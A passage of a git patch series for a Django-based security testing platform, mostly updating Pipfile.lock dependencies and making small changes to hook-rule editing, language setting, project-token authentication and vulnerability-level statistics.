"sha256:d0d651aa754ef58d75cec6edfbd21259d93810b73f6ec246436a21b7841908de" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==41.0.3" }, "dataclasses-json": { "hashes": [ - "sha256:5ec6fed642adb1dbdb4182badb01e0861badfd8fda82e3b67f44b2d1e9d10d21", - "sha256:d82896a94c992ffaf689cd1fafc180164e2abdd415b8f94a7f78586af5886236" + "sha256:5bcd5c1d946a69ef94d8cbb726d87af1256f7ba0898809c7695d299ab9b45122", + "sha256:77cbc80041007c27db90abad79eeed9ea00d4627324b1208266379a6ebdc81e4" ], "index": "pypi", - "markers": "python_version < '3.13' and python_version >= '3.7'", - "version": "==0.5.14" + "version": "==0.6.0" }, "ddt": { "hashes": [ @@ -412,12 +401,11 @@ }, "django": { "hashes": [ - "sha256:a477ab326ae7d8807dc25c186b951ab8c7648a3a23f9497763c37307a2b5ef87", - "sha256:dec2a116787b8e14962014bf78e120bba454135108e1af9e9b91ade7b2964c40" + "sha256:a5de4c484e7b7418e6d3e52a5b8794f0e6b9f9e4ce3c037018cf1c489fa87f3c", + "sha256:d31b06c58aa2cd73998ca5966bc3001243d3c4e77ee2d0c479bced124765fd99" ], "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==3.2.20" + "version": "==3.2.21" }, "django-add-default-value": { "hashes": [ @@ -441,7 +429,6 @@ "sha256:f9749c6410fe738278bc2b6ef17f05195bc7b251693c035752d8257026af024f" ], "index": "pypi", - "markers": "python_version >= '3.8'", "version": "==4.2.0" }, "django-cprofile-middleware": { @@ -465,7 +452,6 @@ "sha256:d12d8e0fc6d3eb26641e553e5d53b191eb8cec611427d4bdce0becb1f7c172b5" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==23.2" }, "django-health-check": { @@ -474,7 +460,6 @@ "sha256:d1b8671e79d1de6e3dd1a9c69566222b0bfcfacca8b90511a4407b2d0d3d2778" ], "index": "pypi", - "markers": "python_version >= '3.8'", "version": "==3.17.0" }, "django-import-export": { @@ -483,7 +468,6 @@ "sha256:cf6f3dabdd4f32dcb26e25c7ddcba7aee3168b55d380b0da79f0349afa17c011" ], "index": "pypi", - "markers": "python_version >= '3.5'", "version": "==2.5.0" }, "django-mock-queries": { @@ -491,7 +475,7 @@ "sha256:7ee3f34752e8131479924ea6952fe37c4106cc18e6fc3e5e9b28b333eeda10b3" ], "index": "pypi", - "version": "==2.1.7" + "version": "==v2.1.7" }, "django-modeltranslation": { "hashes": [ @@ -521,7 +505,6 @@ "sha256:8a99e5582c79f894168f5865c52bd921213253b7fd64d16733ae4591564465de" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==5.2.0" }, "django-rest-framework-proxy": { @@ -537,7 +520,6 @@ "sha256:771f88a24f6166bdb3a944769fa09e24c317ea1b8f5ee8040d121d30b4395219" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==0.4.3" }, "django-silk": { @@ -546,7 +528,6 @@ "sha256:50552f06d9306d06517fbeab9a2c74856355e06304f03ed16b6dd353f7c77e7a" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==5.0.3" }, "django-simple-captcha": { @@ -565,7 +546,7 @@ "sha256:0bbf9eb172c5b06eccff2d704c7c3906e4a2c6146df8c32ee9f3a51e29265581", "sha256:25010658acac0ce4a69211b55dd719fd16dbfe54fcfe5c878d0c8db07bdd5482" ], - "markers": "python_version >= '3.7'", + "index": "pypi", "version": "==1.15.0" }, "django-stubs-ext": { @@ -597,7 +578,6 @@ "sha256:8f0e77289d911069a6a15bab5a25ccf2c0fcb8fc4177461dd17470cfdeb94aa6" ], "index": "pypi", - "markers": "python_version >= '3.6' and python_version < '4.0'", "version": "==2.0" }, "django-xff": { @@ -615,7 +595,6 @@ "sha256:f747949a8ddac876e879190df194b925c177cdeb725a099db1460872f7c0a7f2" ], "index": "pypi", - "markers": "python_version >= '3.5'", "version": "==3.12.4" }, "djangorestframework-dataclasses": { @@ -624,7 +603,6 @@ "sha256:b061ef12f23394e91107f9b915dec38fb0a69d97a0ac9e62207aa90908375211" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==1.3.0" }, "djangorestframework-stubs": { @@ -635,7 +613,7 @@ "sha256:89f6c2add193cb5ab61b9e47187b33a93cc099376a8df5e4d6c3fc8ecb992d3b", "sha256:9475e1374b057ffbdcaaa84a060fe5f01476d8b9014d82a83b4153f57fbcbc1f" ], - "markers": "python_version >= '3.7'", + "index": "pypi", "version": "==1.9.1" }, "docxcompose": { @@ -659,7 +637,6 @@ "sha256:866e16ddaae167a1234c76cd8c351161373551db994ce9665b347b32d5daf38b" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==0.22.1" }, "elasticsearch": { @@ -668,7 +645,6 @@ "sha256:ed9c0cd58e05959a56e306ecf444f794da6afde75b213e26758f7a317e5e668c" ], "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' and python_version < '4'", "version": "==7.17.7" }, "elasticsearch-dsl": { @@ -693,7 +669,6 @@ "sha256:9db2c621eeefbc844c8dd88be64aef61e84e2deb29b271e02ab2b5b9f01068e2" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==2.0.1" }, "gevent": { @@ -752,7 +727,6 @@ "sha256:f7ed2346eb9dc4344f9cb0d7963ce5b74fe16fdd031a2809bb6c2b6eba7ebcd5" ], "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5'", "version": "==22.10.2" }, "gprof2dot": { @@ -839,7 +813,6 @@ "sha256:e0a968b5ba15f8a328fdfd7ab1fcb5af4470c28aaf7e55df02a99bc13138e6e8" ], "index": "pypi", - "markers": "python_version >= '3.5'", "version": "==20.1.0" }, "humanize": { @@ -855,7 +828,6 @@ "sha256:90b73b89f807f8b387beaa7f1f86baa4a64fa5674df5db9ab1a7362433f8e3b8" ], "index": "pypi", - "markers": "python_version >= '3'", "version": "==1.0.20" }, "idna": { @@ -864,7 +836,6 @@ "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" ], "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==2.10" }, "inflection": { @@ -950,7 +921,6 @@ "sha256:fe9fb7748e39b30b5723a7f6695e2f6c58707563b94f1239766d2c8b9550f147" ], "index": "pypi", - "markers": "python_version >= '3.5'", "version": "==1.3.0" }, "jsonlog": { @@ -959,7 +929,6 @@ "sha256:ee313731f2a8611a13e0c15cfcfbab75c524f27c8bae24eaeb7ee7a061a60c55" ], "index": "pypi", - "markers": "python_version >= '3.6' and python_version < '4.0'", "version": "==4.0.0" }, "jsonschema": { @@ -968,7 +937,6 @@ "sha256:f660066c3966db7d6daeaea8a75e0b68237a48e51cf49882087757bb59916248" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==4.17.0" }, "kombu": { @@ -1053,7 +1021,6 @@ "sha256:fe749b052bb7233fe5d072fcb549221a8cb1a16725c47c37e42b0b9cb3ff2c3f" ], "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==4.9.1" }, "marisa-trie": { @@ -1123,7 +1090,6 @@ "sha256:fb76cbb76a10231b6e7366a31a7eecfc742d32f8988ded0b5ae8b325c49ef103" ], "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==0.8.0" }, "markuppy": { @@ -1138,8 +1104,11 @@ "sha256:0a4e4a1aff6c7ac4cd55792abf96c915634c2b97e3cc1c7129578aa68ebd754e", "sha256:10bbfe99883db80bdbaff2dcf681dfc6533a614f700da1287707e8a5d78a8431", "sha256:134da1eca9ec0ae528110ccc9e48041e0828d79f24121a1a146161103c76e686", + "sha256:14ff806850827afd6b07a5f32bd917fb7f45b046ba40c57abdb636674a8b559c", "sha256:1577735524cdad32f9f694208aa75e422adba74f1baee7551620e43a3141f559", "sha256:1b40069d487e7edb2676d3fbdb2b0829ffa2cd63a2ec26c4938b2d34391b4ecc", + "sha256:1b8dd8c3fd14349433c79fa8abeb573a55fc0fdd769133baac1f5e07abf54aeb", + "sha256:1f67c7038d560d92149c060157d623c542173016c4babc0c1913cca0564b9939", "sha256:282c2cb35b5b673bbcadb33a585408104df04f14b2d9b01d4c345a3b92861c2c", "sha256:2c1b19b3aaacc6e57b7e25710ff571c24d6c3613a45e905b1fde04d691b98ee0", "sha256:2ef12179d3a291be237280175b542c07a36e7f60718296278d8593d21ca937d4", @@ -1147,6 +1116,7 @@ "sha256:3c0fae6c3be832a0a0473ac912810b2877c8cb9d76ca48de1ed31e1c68386575", "sha256:3fd4abcb888d15a94f32b75d8fd18ee162ca0c064f35b11134be77050296d6ba", "sha256:42de32b22b6b804f42c5d98be4f7e5e977ecdd9ee9b660fda1a3edf03b11792d", + "sha256:47d4f1c5f80fc62fdd7777d0d40a2e9dda0a05883ab11374334f6c4de38adffd", "sha256:504b320cd4b7eff6f968eddf81127112db685e81f7e36e75f9f84f0df46041c3", "sha256:525808b8019e36eb524b8c68acdd63a37e75714eac50e988180b169d64480a00", "sha256:56d9f2ecac662ca1611d183feb03a3fa4406469dafe241673d521dd5ae92a155", @@ -1155,6 +1125,7 @@ "sha256:68e78619a61ecf91e76aa3e6e8e33fc4894a2bebe93410754bd28fce0a8a4f9f", "sha256:69c0f17e9f5a7afdf2cc9fb2d1ce6aabdb3bafb7f38017c0b77862bcec2bbad8", "sha256:6b2b56950d93e41f33b4223ead100ea0fe11f8e6ee5f641eb753ce4b77a7042b", + "sha256:715d3562f79d540f251b99ebd6d8baa547118974341db04f5ad06d5ea3eb8007", "sha256:787003c0ddb00500e49a10f2844fac87aa6ce977b90b0feaaf9de23c22508b24", "sha256:7ef3cb2ebbf91e330e3bb937efada0edd9003683db6b57bb108c4001f37a02ea", "sha256:8023faf4e01efadfa183e863fefde0046de576c6f14659e8782065bcece22198", @@ -1162,9 +1133,12 @@ "sha256:8afafd99945ead6e075b973fefa56379c5b5c53fd8937dad92c662da5d8fd5ee", "sha256:8c41976a29d078bb235fea9b2ecd3da465df42a562910f9022f1a03107bd02be", "sha256:8e254ae696c88d98da6555f5ace2279cf7cd5b3f52be2b5cf97feafe883b58d2", + "sha256:8f9293864fe09b8149f0cc42ce56e3f0e54de883a9de90cd427f191c346eb2e1", "sha256:9402b03f1a1b4dc4c19845e5c749e3ab82d5078d16a2a4c2cd2df62d57bb0707", "sha256:962f82a3086483f5e5f64dbad880d31038b698494799b097bc59c2edf392fce6", + "sha256:9aad3c1755095ce347e26488214ef77e0485a3c34a50c5a5e2471dff60b9dd9c", "sha256:9dcdfd0eaf283af041973bff14a2e143b8bd64e069f4c383416ecd79a81aab58", + "sha256:aa57bd9cf8ae831a362185ee444e15a93ecb2e344c8e52e4d721ea3ab6ef1823", "sha256:aa7bd130efab1c280bed0f45501b7c8795f9fdbeb02e965371bbef3523627779", "sha256:ab4a0df41e7c16a1392727727e7998a467472d0ad65f3ad5e6e765015df08636", "sha256:ad9e82fb8f09ade1c3e1b996a6337afac2b8b9e365f926f5a61aacc71adc5b3c", @@ -1183,7 +1157,9 @@ "sha256:df0be2b576a7abbf737b1575f048c23fb1d769f267ec4358296f31c2479db8f9", "sha256:e09031c87a1e51556fdcb46e5bd4f59dfb743061cf93c4d6831bf894f125eb57", "sha256:e4dd52d80b8c83fdce44e12478ad2e85c64ea965e75d66dbeafb0a3e77308fcc", - "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2" + "sha256:f698de3fd0c4e6972b92290a45bd9b1536bffe8c6759c62471efaa8acb4c37bc", + "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2", + "sha256:ffcc3f7c66b5f5b7931a5aa68fc9cecc51e685ef90282f4a82f0f5e9b704ad11" ], "markers": "python_version >= '3.7'", "version": "==2.1.3" @@ -1242,7 +1218,6 @@ "sha256:eda5c8b9949ed411ff752b9a01adda31afe7eae1e53e946dbdf9db23865e66c4" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==1.0.1" }, "mypy-extensions": { @@ -1264,7 +1239,6 @@ "sha256:9c6b142836c7dba4f723bf9c93cc46b6e5081d65b2af807f400dda9eb85a16d0" ], "index": "pypi", - "markers": "python_version >= '3.8'", "version": "==2.2.0" }, "networkit": { @@ -1297,7 +1271,7 @@ "sha256:4f33f68cb2afcf86f28a45f43efc27a9386b535d567d2127f8f61d51dec58d36", "sha256:de346335408f84de0eada6ff9fafafff9bcda11f0a0dfaa931133debb146ab61" ], - "markers": "python_version >= '3.8'", + "index": "pypi", "version": "==3.1" }, "numpy": { @@ -1344,7 +1318,6 @@ "sha256:8f3b11bd896a95468a4ab162fc4fcd260d46157155d1f8bfaabb99d88cfcf79f" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==3.0.9" }, "oss2": { @@ -1360,7 +1333,6 @@ "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==21.3" }, "pandas": { @@ -1386,7 +1358,6 @@ "sha256:eb20252720b1cc1b7d0b2879ffc7e0542dd568f24d7c4b2347cb035206936421" ], "index": "pypi", - "markers": "python_version >= '3.9'", "version": "==2.1.0" }, "pep8": { @@ -1462,7 +1433,6 @@ "sha256:f1ff2ee69f10f13a9596480335f406dd1f70c3650349e2be67ca3139280cade0" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==9.3.0" }, "prometheus-client": { @@ -1565,7 +1535,6 @@ "sha256:f8524b8bc89470cec7ac51734907818d3620fb1637f8f8b542d650ebec42a126" ], "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==3.14.1" }, "pydantic": { @@ -1610,13 +1579,20 @@ "markers": "python_version >= '3.7'", "version": "==1.10.12" }, + "pydot": { + "hashes": [ + "sha256:248081a39bcb56784deb018977e428605c1c758f10897a339fce1dd728ff007d", + "sha256:66c98190c65b8d2e2382a441b4c0edfdb4f4c025ef9cb9874de478fb0793a451" + ], + "index": "pypi", + "version": "==1.4.2" + }, "pymysql": { "hashes": [ "sha256:41fc3a0c5013d5f039639442321185532e3e2c8924687abe6537de157d403641", "sha256:816927a350f38d56072aeca5dfb10221fe1dc653745853d30a216637f5d7ad36" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==1.0.2" }, "pyparsing": { @@ -1648,7 +1624,6 @@ "sha256:f3ae7b087abcbc4b910d535c2fb877ef452b61d2514a63fd15b8b020b51fe4b5" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==0.3.6" }, "pyrsistent": { @@ -1677,7 +1652,6 @@ "sha256:d16ac5ab3d9db78fed40c884d67079524e4cf8276639211ad9e6fa73e727727e" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==0.19.1" }, "python-crontab": { @@ -1708,7 +1682,6 @@ "sha256:f380b826a991ebbe3de4d897aeec42760035ac760345e57b812938dc8b35e2bd" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==2.0.7" }, "pytz": { @@ -1781,7 +1754,6 @@ "sha256:da92a39fec86438d3f1e2a1db33c312985806954fe860120b582a8430e231d8f" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==4.4.4" }, "requests": { @@ -1790,7 +1762,6 @@ "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==2.31.0" }, "result": { @@ -1799,7 +1770,6 @@ "sha256:d6a6258f32c057a4e0478999c6ce43dcadaf8ea435f58ac601ae2768f93ef243" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==0.8.0" }, "s3transfer": { @@ -1847,7 +1817,6 @@ "sha256:e197a19aa8ec9722928f2206f8de752def0e4c9fc6953527360d1c36d94ddb2f" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==65.5.1" }, "shortuuid": { @@ -1856,7 +1825,6 @@ "sha256:fc75f2615914815a8e4cb1501b3a513745cb66ef0fd5fc6fb9f8c3fa3481f789" ], "index": "pypi", - "markers": "python_version >= '3.5'", "version": "==1.0.11" }, "simhash": { @@ -1876,7 +1844,6 @@ "sha256:8b74bedcbbbaca38ff6d7491d76f2b06b3592611af620f8426e82dddb04a5ced" ], "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.15.0" }, "sqlparse": { @@ -2011,7 +1978,6 @@ "sha256:b75ddc264f0ba5615db7ba217daeb99701ad295353c45f9e95963337ceeeffb2" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==4.7.1" }, "typing-inspect": { @@ -2043,7 +2009,6 @@ "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" ], "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' and python_version < '4'", "version": "==1.26.5" }, "uwsgi": { From 7a68866c9a09eb9bcd82dfcced18e145333aacec Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 13 Sep 2023 10:44:10 +0800 Subject: [PATCH 087/114] fix: modify rule value --- dongtai_web/views/engine_hook_rule_modify.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_web/views/engine_hook_rule_modify.py b/dongtai_web/views/engine_hook_rule_modify.py index a82862678..cb2bc2cd3 100644 --- a/dongtai_web/views/engine_hook_rule_modify.py +++ b/dongtai_web/views/engine_hook_rule_modify.py @@ -147,7 +147,7 @@ def post(self, request): strategy = HookStrategy.objects.filter(id=rule_id).first() if not strategy: return R.failure(msg=_("No such hookstrategy.")) - if strategy.system_type: + if strategy.system_type and rule_value != strategy.value: return R.failure(msg="Can not modify preset rule") if HookStrategy.objects.filter(language_id=strategy.language_id, type=strategy.type, value=rule_value).exists(): return R.failure(msg="Already exists same rule") From 5e9a5313b8700220d19b9148fc03f4d1df8312c0 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 13 Sep 2023 11:13:38 +0800 Subject: [PATCH 088/114] fix: set language --- static/i18n/views/setlang.py | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/static/i18n/views/setlang.py b/static/i18n/views/setlang.py index cafb25565..205675f08 100644 --- a/static/i18n/views/setlang.py +++ b/static/i18n/views/setlang.py @@ -8,9 +8,8 @@ from django.conf import settings from django.http import JsonResponse -from django.utils.translation import gettext_lazy as _ -from dongtai_common.endpoint import AnonymousAndUserEndPoint, R +from dongtai_common.endpoint import AnonymousAndUserEndPoint from dongtai_conf.settings import LANGUAGES from dongtai_web.utils import extend_schema_with_envcheck @@ -32,9 +31,7 @@ class LanguageSetting(AnonymousAndUserEndPoint): summary="切换语言", ) def get(self, request): - lang_code = request.GET.get(LANGUAGE_QUERY_PARAMETER) - if lang_code not in ALLOWED_LANG_CODE: - return R.failure(msg=_("this language not supported now")) + lang_code = "zh" response = JsonResponse({"status": 201}) if request.user.is_authenticated: user = request.user From 4ae170e4314e6f2dec558e3575891e11cb9fb744 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 13 Sep 2023 11:32:30 +0800 Subject: [PATCH 089/114] fix: modify rule value --- dongtai_web/views/engine_hook_rule_modify.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/dongtai_web/views/engine_hook_rule_modify.py b/dongtai_web/views/engine_hook_rule_modify.py index cb2bc2cd3..7a73651eb 100644 --- a/dongtai_web/views/engine_hook_rule_modify.py +++ b/dongtai_web/views/engine_hook_rule_modify.py @@ -149,8 +149,6 @@ def post(self, request): return R.failure(msg=_("No such hookstrategy.")) if strategy.system_type and rule_value != strategy.value: return R.failure(msg="Can not modify preset rule") - if HookStrategy.objects.filter(language_id=strategy.language_id, type=strategy.type, value=rule_value).exists(): - return R.failure(msg="Already exists same rule") if strategy.type == 4: hook_type = IastStrategyModel.objects.filter( From 33b1264ff492907cba7193d35e1f4cf00321cfc8 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Wed, 13 Sep 2023 12:20:50 +0800 Subject: [PATCH 090/114] deps: add more itertools --- Pipfile | 1 + Pipfile.lock | 34 +++++++++++++++++++++------------- 2 files changed, 22 insertions(+), 13 deletions(-) diff --git a/Pipfile b/Pipfile index cefe1eecf..28a33a7f1 100644 --- a/Pipfile +++ b/Pipfile @@ -93,6 +93,7 @@ django-add-default-value = "==0.10.0" networkx = {extras = ["all"], version = "*"} pandas = "~=2.1.0" pydot = "*" +more-itertools = "*" [dev-packages] diff --git a/Pipfile.lock b/Pipfile.lock index 060ae6fcc..95183592a 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,7 +1,7 @@ { "_meta": { "hash": { - "sha256": "0588445f29e048a73e3a01d5782635221139f8104574105521a44163db44e6f7" + "sha256": "c9e58f315e908fc3858271e78cc4ee73aa4f703e1320fe97d6ba4c7b02a782e0" }, "pipfile-spec": 6, "requires": { @@ -93,11 +93,11 @@ }, "boto3-stubs": { "hashes": [ - "sha256:5ea7ca5ef2f9f66d35ed118b0bbc5db8a2dba7c40a35a7cd3da1698b3ba4c728", - "sha256:d301eef7571053ffcab26b822fdb6a6a8d03c0896b12bafd44d0ed2df952ab46" + "sha256:489a027b5298e840f889cb3213ecfe44fbbdc16156a648fcd2bf0824156dfe2b", + "sha256:a448163c1ef6e3fb383b0a2b25dcadb2cf8b0571ff4a39db9cf6b83760bad7f0" ], "index": "pypi", - "version": "==1.28.45" + "version": "==1.28.46" }, "botocore": { "hashes": [ @@ -109,11 +109,11 @@ }, "botocore-stubs": { "hashes": [ - "sha256:05775849ec4d1c5c489bd27d94d4e577408b24125ac460839a409b1401eb5869", - "sha256:9036f753cfce92111206401a7e73874576fcd8f6690e9c161a4ce5ccce9da8f2" + "sha256:120334397569ec75f17dc0503d438b5d7791c82ea375bfac98d41a4fad0e1fe9", + "sha256:5d19d73de8aabef48ea7d9fe6ffab83bb46d066080d5aed82403fc3478f6b5b9" ], "index": "pypi", - "version": "==1.31.45" + "version": "==1.31.46" }, "celery": { "hashes": [ @@ -599,11 +599,11 @@ }, "djangorestframework-dataclasses": { "hashes": [ - "sha256:802300f812a96715079209f8dabecbab0b9716ae34a770db61f51a6897916abf", - "sha256:b061ef12f23394e91107f9b915dec38fb0a69d97a0ac9e62207aa90908375211" + "sha256:ca1aa1ca99b5306af874376f37355593bb3d1ac7d658d54e2790f9b303968065", + "sha256:d3796b5ce3f7266d525493c557ce7df9ffeae4367006250298ea4d94da4106c4" ], "index": "pypi", - "version": "==1.3.0" + "version": "==1.3.1" }, "djangorestframework-stubs": { "extras": [ @@ -1188,6 +1188,14 @@ "markers": "python_version >= '3'", "version": "==1.15.0" }, + "more-itertools": { + "hashes": [ + "sha256:626c369fa0eb37bac0291bce8259b332fd59ac792fa5497b59837309cd5b114a", + "sha256:64e0735fcfdc6f3464ea133afe8ea4483b1c5fe3a3d69852e6503b43a0b222e6" + ], + "index": "pypi", + "version": "==10.1.0" + }, "mypy": { "hashes": [ "sha256:0af4f0e20706aadf4e6f8f8dc5ab739089146b83fd53cb4a7e0e850ef3de0bb6", @@ -1942,11 +1950,11 @@ }, "types-redis": { "hashes": [ - "sha256:4f662060247a2363c7a8f0b7e52915d68960870ff16a749a891eabcf87ed0be4", - "sha256:5f179d10bd3ca995a8134aafcddfc3e12d52b208437c4529ef27e68acb301f38" + "sha256:7865a843802937ab2ddca33579c4e255bfe73f87af85824ead7a6729ba92fc52", + "sha256:e0e9dcc530623db3a41ec058ccefdcd5c7582557f02ab5f7aa9a27fe10a78d7e" ], "index": "pypi", - "version": "==4.6.0.5" + "version": "==4.6.0.6" }, "types-requests": { "hashes": [ From f24ab8e1caf1f6b7837e314044d5ba505cfeb77b Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Wed, 13 Sep 2023 15:39:08 +0800 Subject: [PATCH 091/114] feat/project token p2 --- dongtai_common/common/utils/__init__.py | 5 ++--- dongtai_common/endpoint/__init__.py | 11 +++++++++-- dongtai_conf/settings.py | 2 +- dongtai_protocol/views/agent_download.py | 6 +++++- 4 files changed, 17 insertions(+), 7 deletions(-) diff --git a/dongtai_common/common/utils/__init__.py b/dongtai_common/common/utils/__init__.py index 6b2561ab7..78f313491 100644 --- a/dongtai_common/common/utils/__init__.py +++ b/dongtai_common/common/utils/__init__.py @@ -161,7 +161,7 @@ def authenticate(self, request): return self.auth_decodedenticate_credentials(token) -@cached_decorator(random_range=(60, 120), use_celery_update=False) +@cached_decorator(random_range=(300, 600), use_celery_update=False) def get_user_from_project_key(key): from dongtai_common.models.project import IastProject from dongtai_common.models.user import User @@ -183,7 +183,6 @@ def auth_decodedenticate_credentials(self, key): from dongtai_common.models.project import IastProject try: - warnings.warn("Department token is departured. Please use new token to register agent.", stacklevel=1) user = get_user_from_project_key(key) except IastProject.DoesNotExist as e: raise exceptions.AuthenticationFailed(_("Invalid token.")) from e @@ -193,5 +192,5 @@ def authenticate(self, request): auth = get_authorization_header(request) if not auth or not auth.lower().startswith(self.keyword.lower().encode()): return None - token = auth.lower().replace(self.keyword.lower().encode(), b"", 1).decode() + token = auth[13:].decode() return self.auth_decodedenticate_credentials(token) diff --git a/dongtai_common/endpoint/__init__.py b/dongtai_common/endpoint/__init__.py index 455fc641c..253e41ca2 100644 --- a/dongtai_common/endpoint/__init__.py +++ b/dongtai_common/endpoint/__init__.py @@ -17,7 +17,10 @@ from rest_framework.exceptions import AuthenticationFailed from rest_framework.views import APIView -from dongtai_common.common.utils import DepartmentTokenAuthentication +from dongtai_common.common.utils import ( + DepartmentTokenAuthentication, + ProjectTokenAuthentication, +) from dongtai_common.models import User from dongtai_common.models.agent import IastAgent from dongtai_common.models.asset import Asset @@ -337,7 +340,11 @@ class UserEndPoint(MixinAuthEndPoint): class OpenApiEndPoint(EndPoint): - authentication_classes = (DepartmentTokenAuthentication, TokenAuthentication) + authentication_classes = ( + ProjectTokenAuthentication, + DepartmentTokenAuthentication, + TokenAuthentication, + ) permission_classes = (UserPermission,) diff --git a/dongtai_conf/settings.py b/dongtai_conf/settings.py index ff8aa7f8a..08994e0d9 100644 --- a/dongtai_conf/settings.py +++ b/dongtai_conf/settings.py @@ -119,9 +119,9 @@ def get_installed_apps(): "PAGE_SIZE": 20, "DEFAULT_PAGINATION_CLASS": ["django.core.paginator"], "DEFAULT_AUTHENTICATION_CLASSES": [ + "dongtai_common.common.utils.ProjectTokenAuthentication", "rest_framework.authentication.SessionAuthentication", "dongtai_common.common.utils.DepartmentTokenAuthentication", - "dongtai_common.common.utils.ProjectTokenAuthentication", "rest_framework.authentication.TokenAuthentication", ], "DEFAULT_RENDERER_CLASSES": [ diff --git a/dongtai_protocol/views/agent_download.py b/dongtai_protocol/views/agent_download.py index e5f8262b6..a78cea863 100644 --- a/dongtai_protocol/views/agent_download.py +++ b/dongtai_protocol/views/agent_download.py @@ -16,7 +16,10 @@ from rest_framework.authentication import SessionAuthentication, TokenAuthentication from rest_framework.authtoken.models import Token -from dongtai_common.common.utils import DepartmentTokenAuthentication +from dongtai_common.common.utils import ( + DepartmentTokenAuthentication, + ProjectTokenAuthentication, +) from dongtai_common.endpoint import OpenApiEndPoint, R from dongtai_conf.settings import BUCKET_NAME_BASE_URL, VERSION from dongtai_protocol.api_schema import DongTaiParameter @@ -283,6 +286,7 @@ class AgentDownload(OpenApiEndPoint): name = "download_iast_agent" description = "下载洞态Agent" authentication_classes = ( + ProjectTokenAuthentication, DepartmentTokenAuthentication, TokenAuthentication, SessionAuthentication, From a0369cf0c59ee6b46a66e6d40ffeaa806e1c8a01 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Wed, 13 Sep 2023 15:55:11 +0800 Subject: [PATCH 092/114] feat/remove no risk level --- dongtai_web/views/utils/commonstats.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/dongtai_web/views/utils/commonstats.py b/dongtai_web/views/utils/commonstats.py index dd9511d2d..7ba10d00f 100644 --- a/dongtai_web/views/utils/commonstats.py +++ b/dongtai_web/views/utils/commonstats.py @@ -187,7 +187,10 @@ def get_summary_by_project(project_id: int, project_version_id: int): timestamp_gt = current_timestamp queryset_list = [] queryset_ = IastVulnerabilityModel.objects.filter( - project_id=project_id, project_version_id=project_version_id, is_del=0 + project_id=project_id, + project_version_id=project_version_id, + is_del=0, + level_id__in=(1, 2, 3, 5), ) for timestamp, _ in daylist: queryset_list.append(geneatre_vul_timerange_count_queryset(queryset_, timestamp_gt, timestamp, wkey)) @@ -223,7 +226,7 @@ def get_summary_by_project(project_id: int, project_version_id: int): day = time.localtime(last_timestamp + 86400 * i) day_num_data.append(get_empty_day_num_num(str(day.tm_mon) + "-" + str(day.tm_mday))) data["day_num"] = day_num_data - levelInfo = IastVulLevel.objects.all() + levelInfo = IastVulLevel.objects.filter(pk__in=(1, 2, 3, 5)).all() levelIdArr = {} levelNum = [] if levelInfo: @@ -242,7 +245,7 @@ def get_summary_by_project(project_id: int, project_version_id: int): def get_empty_day_num_num(day_label: str): obj = {"day_label": day_label, "day_num": 0} - for i in range(1, 5 + 1): + for i in (1, 2, 3, 5): obj["day_num_level_" + str(i)] = 0 return obj From cf96f1a477d55fbabe4208281be55954963f985e Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Wed, 13 Sep 2023 16:09:49 +0800 Subject: [PATCH 093/114] feat/project token p2 --- dongtai_web/views/project_token.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_web/views/project_token.py 